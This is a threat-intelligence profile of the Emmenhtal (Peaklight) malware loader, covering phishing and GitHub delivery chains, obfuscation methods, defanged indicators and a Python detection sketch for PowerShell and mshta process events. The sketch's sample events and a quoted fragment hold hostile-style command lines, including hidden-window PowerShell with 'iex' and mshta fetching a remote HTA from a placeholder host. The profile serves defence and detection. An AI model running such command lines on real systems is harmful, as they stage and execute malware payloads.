Emmenhtal
Emmenhtal is a multistage malware loader/downloader active since at least April 2024. It has also been referred to as Peaklight by Google/Mandiant, while some reporting uses the spelling “EmmenHTAl” specifically for its HTA component. It is used by financially motivated threat actors and has been observed in malware-as-a-service delivery chains to fetch and execute follow-on payloads including Amadey, SmokeLoader, commodity infostealers such as CryptBot and Lumma, and other stealers or RATs.
Reported delivery vectors include phishing emails and public GitHub repositories. In one campaign targeting Ukrainian entities, Talos assessed JavaScript files inside ZIP, 7-Zip, or RAR phishing attachments as Emmenhtal; these used multiple layers of obfuscation to conceal a PowerShell downloader. Similar Emmenhtal samples were also hosted in public GitHub repositories and used to deliver Amadey. In another campaign targeting First Ukrainian International Bank (pumb[.]ua), a payment-themed phishing email delivered a 7z archive containing a lure PDF and an internet shortcut that downloaded a malicious LNK from 194[.]87[.]31[.]68:80. Execution then launched PowerShell and mshta, abused a modified DCCW.exe as a loader, and ran an HTA/JavaScript-based Emmenhtal stage that in turn launched encoded PowerShell to download a lure PDF and a SmokeLoader payload into the user's AppData directory. Network activity in that campaign also included 88[.]151[.]192[.]165.
Emmenhtal is characterized by heavy obfuscation and staged script execution. Observed techniques include layered JavaScript obfuscation, eval and charCode-style encoding, PowerShell with flags such as -w 1, -ep Unrestricted, and -nop, and LOLBAS use of mshta. A large sample delivered via KongTuke used more than 56,000 lines of junk mathematical operations, a 284 KB base64 byte array, and .NET reflection-based execution; ClamAV detects that sample as Win.Downloader.Emmenhtal-10044033-0. Emmenhtal has also been associated with polyglot-file tradecraft in malware campaigns.
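The PowerShell switches and mshta parent/child relationships described above are what a defender can key on in process-creation telemetry. The following detection sketch is an added example, not code from the page or from any vendor; the events, paths and the placeholder URL are constructed, and the rule names are hypothetical.

```python
import re
from typing import Dict, List

# Constructed process-creation events modelled on the chain described above
# (mshta / DCCW.exe -> PowerShell with -w 1, -ep Unrestricted, -nop). Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w 1 -ep Unrestricted -nop -c "iex(...)"'},
    {"parent": r"C:\Windows\explorer.exe",  # benign admin usage: -NoProfile alone
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Users\user\AppData\Local\Temp\dccw.exe",  # DCCW.exe outside Windows dir
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/stage.hta"},
]

# PowerShell accepts abbreviated switches, so match the common short and long spellings.
HIDDEN_WINDOW = re.compile(r"(?<!\S)-w(?:in(?:dowstyle)?)?\s+(?:1|hidden)(?!\S)", re.I)
LAX_EXEC_POLICY = re.compile(r"(?<!\S)-e(?:p|x(?:ecutionpolicy)?)\s+(?:unrestricted|bypass)(?!\S)", re.I)
NO_PROFILE = re.compile(r"(?<!\S)-nop(?:rofile)?(?!\S)", re.I)
REMOTE_HTA = re.compile(r"https?://\S+", re.I)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: Dict[str, str]) -> List[str]:
    """Return hypothetical rule names for the Emmenhtal-style traits present in one event."""
    hits: List[str] = []
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    if image in ("powershell.exe", "pwsh.exe"):
        flags = [name for name, pat in (("hidden_window", HIDDEN_WINDOW),
                                        ("lax_exec_policy", LAX_EXEC_POLICY),
                                        ("no_profile", NO_PROFILE)) if pat.search(cmd)]
        # -nop alone is routine; require the hidden window plus at least one more loader flag.
        if "hidden_window" in flags and len(flags) >= 2:
            hits.append("powershell_loader_flags")
        if parent in SCRIPT_HOSTS:
            hits.append("powershell_from_script_host")
    if image == "mshta.exe":
        if REMOTE_HTA.search(cmd):
            hits.append("mshta_remote_hta")
        if parent != "explorer.exe" and "\\windows\\" not in event["parent"].lower():
            hits.append("mshta_unusual_parent")
    return hits

def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each suspicious event to the rules it triggered."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```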
The loader has been linked to campaigns targeting Ukrainian entities and has appeared in broader MaaS/TDS ecosystems. Cisco Talos reported a 2025 MaaS operation using Emmenhtal and Amadey, often leveraging fake public GitHub accounts such as Legendary99999, DFfe9ewf, and Milidmdds to stage payloads and scripts. Emmenhtal has also been observed as a downstream payload in KongTuke/404 TDS-style initial access chains. Known observables directly mentioned in reporting include pivqmane[.]com/testonload[.]mp4/, pivqmane[.]com/doc/fb[.]mp4, 194[.]87[.]31[.]68, and 88[.]151[.]192[.]165, as well as the SHA-256 e190ad0b45882fdd19e62883151803a32adb148e8eb7475f1b316a00d9ecc82f for an Emmenhtal sample.
We observed a malicious campaign targeting First Ukrainian International Bank (pumb[.]ua) and noticed the usage of a stealthy malware loader known as Emmenhtal (sic! - this spelling refers to the HTA component of this loader, hence slightly unorthodox spelling "EmmenHTAl") also referred to by Google as Peaklight.
Techniques & procedures
Execution
The command uses ROT cipher or XOR obfuscation... powershell.exe -ep bypass -c iex ...
The execution of the JavaScript and PowerShell script resulted in the download and execution of SmokeLoader on the victim system.
Talos discovered another unique file on the “Milidmdds” GitHub account during this research — a malicious Python script named “checkbalance.py”.
Recent activity
Emmenhtal is referenced as a malware loader used to propagate Amadey.
A heavily obfuscated PowerShell loader/downloader that uses large amounts of junk math operations, embedded base64 byte arrays, XOR decoding, and .NET reflection-based execution to load and run a payload while evading static analysis and sandboxing.
A named malware used in a MaaS operation, linked in the content to threats against Ukrainian entities.
A loader used in a MaaS operation to deliver additional malicious payloads, leveraging public GitHub repositories as a distribution channel.